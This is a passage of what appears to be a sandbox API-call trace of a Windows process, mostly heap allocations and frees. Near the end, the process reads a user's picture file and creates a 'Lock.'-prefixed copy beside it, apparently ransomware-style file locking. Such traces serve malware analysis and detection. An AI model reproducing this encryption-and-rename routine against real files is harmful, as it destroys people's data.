(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.147] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.148] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.148] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.149] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.150] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.150] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.151] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.151] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.151] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.151] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.151] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.151] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.152] CryptDestroyHash (hHash=0xaa5960) returned 1 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.152] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.153] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/krvo L5sveZ W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\krvo l5svez w.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.154] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.154] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x2420898 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.156] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0256.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.krvo L5sveZ W.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.krvo l5svez w.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0256.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0256.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 